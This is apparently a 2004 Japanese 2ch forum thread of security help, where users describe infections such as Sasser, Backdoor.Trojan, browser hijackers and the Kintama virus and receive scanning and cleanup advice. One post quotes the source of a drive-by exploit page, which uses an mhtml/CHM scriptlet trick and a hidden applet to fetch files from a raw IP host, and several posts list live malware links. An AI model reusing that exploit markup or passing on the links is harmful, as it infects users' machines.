[02:04:06 10/01/04][　■2ch BBS .. - Microsoft Internet Explorer]
[http://www2.2ch.net/2ch.html]ではじまり、
半角英数の入力分しか記録してないようです。
全角部分はすべて{left}{up}{right}、あとは{Bkp}{Ent}
なにかアドバイスください･･･

青くさせちゃってすいません･･･

>>898
非通知のワン切りって、なんも意味ないような気がするけどなぁ。

>>900
タスクマネージャーで怪しげなタスクがないか確認してみて。

正常なタスク一覧
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html
ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm

悪いけど寝るわﾉｼ
起きてる回答者の方（いたら）よろしく〜

>>886
TROJ_OTORUN.A ？
ウィルスバスターでは検知してくれるけどノートンは知らん。

これをあやまって開いてしまったんですが、私のPCはもう感染してしまったのでしょうか。
ソースを表示してみると、へんなJAVAscriptの記述があったり・・・

ｈttp://213.159.117.133/dl/ms.php
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'？s-its:mhtml:file://c:\\nosuch.mht!http://213.159.117.133/dl/ms/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderms.jar code=Counter></APPLET></body></html>

とあるスレで画像URLをクリックしたら、それはウィルスとスパイウェアを送りつけてくる
悪質なサイトでした・・・
今のとこ被害はないのですが、セキュリティソフト入れてなかったため、多分感染してると思います
パソコンには会社の重要なファイルなどがあるので、消されてしまったりしたらやばいんですけど
まあ、それは自分がセキュリティ管理甘かったってのもありますが
被害が出た場合、こういう悪質なリンクを張る2chネラを刑事告訴なりできるのでしょうか？
それとも、リンク張る奴はいくら張っても何も対処されないままなのでしょうか？
よろしくおねがいします

>>905
罰せられないこともないと思いますが
それは経済的損失がでないともちろんできません。
よっぽどのときは告訴すれば大丈夫です。
けれど2ちゃんねるは「転んでも泣かない」精神が必要なのでまずは対策からしっかりやらないと。

※告訴されるかもしれないからHDDをぶっとばすようなウイルスへのリンクを張る奴はそうそういません。

できれば仕事用のパソコンとネットなどをする用のパソコンで分ければいいと思います。
重要な書類が消えるってのはバックアップとればなんとかなります。
情報を流出する可能性のあるウイルスなどのためにもそうしたほうがいいです。
情報が流出した場合にはあなたに責任が降りかかってくるかもしれませんから。

nycopを思い出すなぁ・・・

>>906
そうですか、よかった

>>905
重要なデータの入っているPCで2chに貼られているリンクをホイホイ
踏むあなたのセキュリティホールを埋める方が重要。
セキュリティソフト入れていても、新種亜種には無力です。
セキュリティを強化しても、中の人がざるなら意味無し。

>>895
オンラインスキャンのサイトに書いてあるとおりに
レジストリやらいじってみたら、たぶん直ったみたいです！
ありが�d！
勉強になりますた！

>>910
良かったな！次はアンチウイルスソフトの導入だ！！
こんなのとか↓
【ｿｰｽﾈｸｽﾄ】ウイルスセキュリティ2005 Part9【K7】
http://pc5.2ch.net/test/read.cgi/sec/1095983778/l50

>>911
おぃおぃ。
苺キンタマに対応した？

>>911
をいっw

すみません、誤ってこれ踏んでしまったのですがノートンがトロイを発見しました。
そのメッセージが出た以外はインストール画面でＯＫとかはせずに電源を切りました。
これは感染してしまったのでしょうか？今ノートンでスキャンしてますがこれで検出されなければ問題ないですか？

張り忘れました。誤って踏んでしまったのはこれです。（踏まないでください！）
ttp://with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg

踏まないでください、つうならtまで抜けよ(ﾟДﾟ)ｺﾞﾙｧ!!

>>914
最新版でスキャンして見つからなければ一応OK。
ただスパイウェアなんかも入ってる可能性があるので、
ad-awareやspy-botでスキャンしておくと良いかも。

>>917
2002でスキャン終了しましたが検出されませんでした。
ウィルス情報は機能最新のを更新しました。
このまま使い続けて大丈夫でしょうか？

>>918
レジストリとか書き換えられてる可能性もあるから
トロイをまた呼び込んでくることも考えられる。
ときどきチェックした方が良いかも。

質問者も回答者もカスばかり

911
はどういうもの?
怖く踏めないけど、予防のために内容を知りたい。

>>921
ウイルスセキュリティのスレだろ？
評判は以下略。

>>920
ちっ、バレたか・・・。

>>921
安さの裏には何があるか？「予防のために」是非踏め。

つかアドレスからして2ch内のスレだとわかるものが踏めないとはどういうことだ？

(((((((( ；ﾟДﾟ)))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙｶﾞﾀｶﾞﾀﾌﾞﾙｶﾞﾀｶﾞｸｶﾞｸｶﾞｸｶﾞｸｶﾞｸ

ウイルスとかもそうだけどセキュリティホールがあってもそれを
守るOSレベルでOSと連動するようなセキュリティソフトないの？

なんつか、新種ウイルスって出た？
C:\直下にkirby.exeってできるん。そんで、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に名前service 値C:\kirby.exeの値設定されるん。
んで、ネットワークに接続確立してからすぐnetstat /nしてみると宛先ポート445で物凄い勢いでなんかパケット送ってるん。
宛先IPアドレスは、ランダムっぽいけど多分連番でスキャヌしてる雰囲気。
DELODERみたく、SMB使って脆弱パスワド試してるんか、SASSERみたくLSASS の脆弱性突いてるんかわからん。
kirby.exeのサイズは25KB
プロセス殺して、レヂストリ値消して、kirby.exe削除して再起動しるとネット繋ぐまでは何とも無いが、
ネット繋いだとたんまたC:\にカービィ.exe出来るん。
ノートンでkirby.exeスキャヌしてみると検出はするけど名前Backdoor.Trojanとしか出て来ないん。

知人の買ったばかりPCの設定いぢってて、あんまり調子悪いから調べてみたらこんなん出ました。。。
メール送受信の設定どう考えても上手くいかなくて小一時間三十分悩んだん。。。
OSはXPホームでSP１。後は知らん。ログインパスワドたぶん無し。アンチVIRは何も無いん。
・・・・だから初心者買ったばかりXPいぢるの嫌なんぢゃ〜！！
新種で流行しそうだったら誰か新スレ立ててねん。

ぁ､ちなみにノトンの定義ファイルは最新だよん。

>>928
普通はそんなところにそんなファイル無いよね。

>>927
検出してるのに新種のわけあるまい
親玉がサーバーからインストールしてるだけジャン

>>927
トレンドマイクロのオンラインスキャンではどう出るの？

>>931
何も検出されません。
他のｵﾝﾗｲﾝｽｷｬﾇも試してみるでつ。

>930
ﾁｯﾁｯﾁ

ぁぁ､アンテドート簡易版だと
TrojanProxy.Win32.Agent.bjと出まつねん。

>>933
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.BJ
これ？

>>934
なんか違うっぽいでつ。
知人Pcなんで今は他の値とか確認出来ないでつ。
とりあえず、知人PCにはMS04-011パッチでも当ててみて様子見るでつ。
明日仕事忙しいので寝まつ。zzz

>>935
単にトロイ仕込まれてるだけじゃん
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.trojan.html

知人から「ウィルス感染したようなのでPCを見てほしい」とだけ頼まれて、
いま下調べしてる者です。

OSはおそらくXPで、症状は「なんど起動してもOSが強制終了になる」とだけ
聞いています。強制終了前にカウントダウンがあるか、どんなメッセージが
出るかまでは聞きそびれてしまいました。

SasserまたはBlasterの関連かと予想してはいるのですが、
カウントダウンなしにOSが急に落ちるような（上記とは別のタイプの?）ウィルス
情報はあがってますか？　どうぞお願いします。

>>937
てか、まずスキャンしてみるのが早いと思いまつ。
アンチドート簡易版でもオンラインスキャンでもいいですから。

即レス！どうもです。

そうですね。今日みにいく予定ですので、まずはOLスキャンをしてみる
つもりです。ありがとうございます。
ただ、急にOSが落とされるようなタイプだとスキャン中に往生してしまうかな
などと思いまして。。。　　追加情報ありましたらおながいします

追加情報じゃなくてｽﾏｿですが、何にせよWindows Updateなんかのセキュ対策教えたり
アンチウィルス買わせなきゃダメっすね

甘やかしたらこの先ずっとお助けマンとしてこき使われますぞ

>急にOSが落とされるようなタイプだとスキャン中に往生してしまうかな

トレンドマイクロ ダメージクリーンナップサービス
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4700
これ入れたFDなど用意してはいかがでしょうか。

>941
それはいいかもしれませんな。SasserやBlasterの活動だって一時的に
止められますからな。
本格的な駆除は別途実施しなくちゃいかんですがな。

代理質問は効率が悪いので本人を降臨させろ

そんなに無防備なPCだと他にもｽﾊﾟｲｳｴｱとかｲﾊﾟｰｲ仕込まれてそうな悪寒
>>937の週末がこれで潰れなきゃEが(((((((( ；ﾟДﾟ)))))))

みなさまどうも。イチローｷﾀｰをしてたら遅くなりました。
とくに>>941さん、さっそくFDに入れました。試してみます。

さて逝ってきます。

>>945
いっちゃったか
そういうなのはハードウェアに問題がある場合も多い罠

知人と言う奴は大抵本人が感染してる

ノートンインターネットセキュリティ２００4
をいれています。
Backdoor.Coreflood が発見され、削除しようとしても
削除されないのですがどうすればよいのでしょうか？
教えてください

>>939
知人のPCはどうでもいいが、OLスキャンの結果報告はしてほしいな

>>948
http://www.symantec.com/region/jp/search/index.html

すみません、もう少し詳しく教えてください

>>951
PestPatrolを導入したらどうかな？
私の友人が同様にバックドア系に感染し困っていたのだが・・
PestPatrolで簡単に駆除できました。

餅は餅屋でがよろいしかとおもいます。
統合型ツールの導入は安い反面、防衛力に少し難があるのではないかな？

>>952
社員乙

952さんお返事ありがとうございます。
初心者で感染も始めてで、よくわからないのですが、
どのような事に気を付ければ防げるのでしょうか？

>>954
初心者初心者言って調べる気がないなら
セキュリティ初心者質問スレッドpart47
http://pc5.2ch.net/test/read.cgi/sec/1095637802/
こっち行け

>>955
そこに誘導するな
断る

>>954
こっちに行け
PC初心者
http://pc6.2ch.net/pcqa/

戻ってきました。
>>947　本人じゃなーい。
自分はAVG,Spybot,Ad-awareの３本セットでふんばってるんじゃ。

…実は当人、ノートン先生を「持っていた」ようで、auto_tscでウィルス活動を
とめ、OLスキャン→先生インストール→退治　と成功しました。
出てきたのはもろもろ１００匹ほどで、想像したほど多くなかったのは
Windows Updateだけはやっていたからでしょうか。
Sasserの中の人みたいのはいましたが、それが主因だったかどうかは
不明です。

いろいろお世話になりました。依頼主が女の子でないのがあれですが。

>>957はお礼にやらないか？と言われてやってきた模様です

ウイルス感染してレジストリが変更され
ウイルスを消してレジストリが変更されたままになっている時に
オンラインスキャンした場合、ひっかかるのですか？

>>959
マルチ

>>960
Download版から飛ばされてきました
ぜひ教えてくださいｍ(＿ ＿)ｍ

>>959
レジストリ検索するスキャンなら引っかかるのでは？

>>962
いつもSymantecのオンラインスキャンしか使わないんですけど
レジストリ検索するスキャンしてますよね？

てか、オンラインスキャンでレジストリまでスキャンされるなんて（ｒｙ

>>961
download板にカエレ

HTML_REDIR.Aのファイル名ぉιぇτ

HTML_REDIR.A

決まったファイル名などない

>>966
その過去の脆弱性を利用しているインストールファイルは全部その名前だ
それよりもウィンドウズアップデート位しろ

777 ：名無しステーション ：04/10/03 17:36:40 ID:6SIqEWMR
http://with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
和田のホームラン

実況板で釣られてウィルスにやられた・・・_|￣|○

IEでHPなどを開こうとすると必ず変なページに行かされるのだが、対処法がわからん。

ウィスルソフトでも駆除できないので困っています＾＾；

>>970
かわいそうに






















何釣られてんだ？（　´,_ゝ｀）

http://www.cty-net.ne.jp/~taitiro/imgboard/data/img20040825044524.jpg
これウイルスらしいんだが

>>970
PestPatrolを導入すれば直るね。

>>972
７種類のウィルスですね。

感染するバカがいるといけないから、削除依頼出しておけよ。

>>972
通報しました

>>970
今さら言っても遅いけど2ＣＨのリンクはＩＥで開くのは嚴禁。

>>970　ここにも書き込まなくちゃ
*.full-tgp.net
これを制限付きサイトに突っ込んであるので痛くも痒くもないんですが？

なんかネットに繋ぐとIEが自動的に
ttp://www.superlawntrucks.com/T.html
ってページ開くようになってしまったんですがこれウイルス？
いつのまにかTT.exeなるアプリケーションがマイコンピュータ内にあるしorz

>>970>>972
まとめて通報しました

>>979
ブラウザジャッカー？
ウイルスというより、スパイウェアかも

>>979
エロイ

>>979
テンプレ読んで実行後質問
じゃなきゃ糞カスフンて言われる

エロサイト見たら…助けて下さい！Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/

うむ。

ていうか
親孝行＞＞＞＞マザコン
だな。親を気遣うだけでマザコンと呼ばれる最近の風潮はどうかと・・・・

そろそろ次スレお願いしﾏﾂ。

今だ！2ｹﾞｯﾄｰ　>>1乙
￣￣￣￣￣∨￣￣￣　　　　　　　(´´
　　　　 ∧∧　　　）　　　　　　(´⌒(´
　　⊂（ﾟДﾟ⊂⌒｀つ≡≡≡(´⌒;;;≡≡≡
　　　　　　 ￣￣　 (´⌒(´⌒;;

早めに流して次に移行した方がよさげかな

キンタマウイルスの削除方法がわからないのですが・・・。
ttp://www.geocities.jp/ichigo_kintama/　ここ見たけれどあまりわかりません
OSはMEです、どなたか教えて下さいまし＿|￣|○

>>989
これは試した？

http://www.ewido.net/en/

>>989
ｎｙ利用者板違い

OLスキャン・・・・ｴﾍﾍﾍﾍ